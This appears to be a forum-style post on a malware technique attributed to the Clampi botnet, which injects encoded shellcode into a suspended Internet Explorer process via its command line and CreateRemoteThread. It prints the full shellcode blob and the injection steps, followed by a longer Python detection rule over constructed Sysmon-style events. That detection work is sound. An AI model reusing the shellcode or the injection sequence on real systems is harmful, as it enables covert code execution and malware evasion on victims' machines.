Using shellcode to inject CODE into Internet Explorer

Create an Internet Explorer process in “Suspended Mode” with no visible window.
Inject the shellcode through the command line:

Code:

C:\\Program Files\\Internet Explorer\\iexplore.exe
\xFC\xEB\x1A^\x8B\xFEW\xAC<Zt\x0F,A\xC0\xE0\x04\x8A\xD8\xAC,A\x02\xC3\xAA\xEB\xECX\xC
3\xE8\xE1\xFF\xFF\xFFILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJAIAAAAAAILNAF
GIKMCCEAPAEEBIIAGEGMBOKAEOCPCMGAGAAFOILHNAEIDMHBFDDMAFGFHFAGKAEFAG
KPPLIFMJEIAHMPPNAILNIIFMAHFBALIDBADJBHMPPNADNLHAAAAAAHELJOLEODDMAFHFA
FAGIBPAAAPAAFDLIAFLJIAHMPPNAIFMAHEDALJAJAAAAAAIJAEAIIJFMAIAEOIBEAAAAAAIL
OMILHFAEILFOANPPHGAJLIHELJIAHMPPNAOLALIPEEAIAIILPIPMPDKEOLAKFDLIEHJLIAHMP
PNADDMAILOFMDZ\0

Use the CreateRemoteThread API to create a remote thread at memory location 0x7C812F1D …

This is where the kernel function GetCommandLineA has been mapped into Internet Explorer’s memory …

GetCommandLineA returns a pointer to the "shell" string, which is passed as a parameter to the current process …

Use the CreateRemoteThread API at memory address 0x004A23DC …

Call ReadProcessMemory …

Use MapViewOfFileEx on the object …

Once again call CreateRemoteThread to execute the injected code!

This method is used by the Clampi botnet.
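The sequence above leaves two things a defender can see from process telemetry: an iexplore.exe launched with a blob of shellcode as its only argument, and a remote thread created into that same process whose start address resolves into kernel32 (GetCommandLineA) instead of into the injector's own code. The following is an added example, not code from the original post or from any Clampi analysis: a small Python correlation rule run over constructed Sysmon-style records. Field names follow Sysmon's process-create (Event ID 1) and CreateRemoteThread (Event ID 8) schema; the PIDs, paths, the dropper name and the sample command line are made up.

```python
"""Added example: correlate a shellcode-like iexplore.exe command line with a
remote thread starting inside kernel32. Records are constructed Sysmon-style
dicts, not captured telemetry."""
import string
from typing import Dict, List

PRINTABLE = set(string.printable)

# Constructed sample data (hypothetical paths and PIDs).
IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"
DROPPER = r"C:\Users\alice\AppData\Local\Temp\dropper.exe"  # hypothetical injector
KERNEL32 = r"C:\Windows\System32\kernel32.dll"

SAMPLE_EVENTS: List[Dict] = [
    # Benign: the user opens a URL from explorer.exe.
    {"EventID": 1, "ProcessId": 2210, "Image": IEXPLORE,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{IEXPLORE}" https://example.com/'},
    # Suspicious: iexplore spawned by the dropper with a shellcode blob as its argument
    # (a few raw bytes followed by an alphanumeric-encoded body, as in the post).
    {"EventID": 1, "ProcessId": 4120, "Image": IEXPLORE, "ParentImage": DROPPER,
     "CommandLine": IEXPLORE + " \xfc\xeb\x1a^\x8b\xfeW\xac<Zt\x0f"
                    + "ILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJ" * 3},
    # Suspicious: remote thread into that process starting at kernel32!GetCommandLineA.
    {"EventID": 8, "SourceProcessId": 3988, "SourceImage": DROPPER,
     "TargetProcessId": 4120, "TargetImage": IEXPLORE,
     "StartModule": KERNEL32, "StartFunction": "GetCommandLineA"},
    # Contrast: a remote thread whose start address lies in the source process itself.
    {"EventID": 8, "SourceProcessId": 5001, "SourceImage": r"C:\Tools\debugger.exe",
     "TargetProcessId": 2210, "TargetImage": IEXPLORE,
     "StartModule": r"C:\Tools\debugger.exe", "StartFunction": ""},
]


def argument_part(event: Dict) -> str:
    """Strip the image path (quoted or bare) from the command line, leaving the arguments."""
    cmd, image = event["CommandLine"], event["Image"]
    for prefix in (f'"{image}"', image):
        if cmd.startswith(prefix):
            return cmd[len(prefix):].strip()
    return cmd


def shellcode_like_argument(event: Dict, min_len: int = 64) -> bool:
    """True for non-printable bytes, or a long unbroken token with no path/URL structure."""
    arg = argument_part(event)
    if any(ch not in PRINTABLE for ch in arg):
        return True
    return len(arg) >= min_len and not any(sep in arg for sep in (" ", "\\", "/", ":"))


def kernel32_start_thread(event: Dict) -> bool:
    """Remote thread whose start address resolves into kernel32 rather than the injector."""
    return event["StartModule"].lower().endswith("kernel32.dll")


def detect(events: List[Dict]) -> Dict[int, Dict]:
    """Return {target_pid: {"severity": ..., "reasons": [...]}} for iexplore.exe targets.
    One indicator is 'medium'; both indicators on the same PID is 'high'."""
    reasons: Dict[int, List[str]] = {}
    for ev in events:
        if (ev["EventID"] == 1 and ev["Image"].lower().endswith("iexplore.exe")
                and shellcode_like_argument(ev)):
            reasons.setdefault(ev["ProcessId"], []).append(
                f"shellcode-like command line, parent={ev['ParentImage']}")
        elif (ev["EventID"] == 8 and ev["TargetImage"].lower().endswith("iexplore.exe")
                and kernel32_start_thread(ev)):
            reasons.setdefault(ev["TargetProcessId"], []).append(
                f"remote thread from {ev['SourceImage']} starting at "
                f"kernel32!{ev['StartFunction'] or '?'}")
    return {pid: {"severity": "high" if len(r) > 1 else "medium", "reasons": r}
            for pid, r in reasons.items()}


if __name__ == "__main__":
    for pid, alert in detect(SAMPLE_EVENTS).items():
        print(pid, alert["severity"], *alert["reasons"], sep="\n  ")
```

Each indicator on its own is noisy (legitimate tooling creates remote threads, and odd command lines exist), so the rule only raises a high-severity alert when both land on the same target PID. In a real pipeline the PID correlation should also be bounded in time and keyed on the process GUID rather than the reusable PID.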

Thanks to the researchers …

Browse to them to get more info!
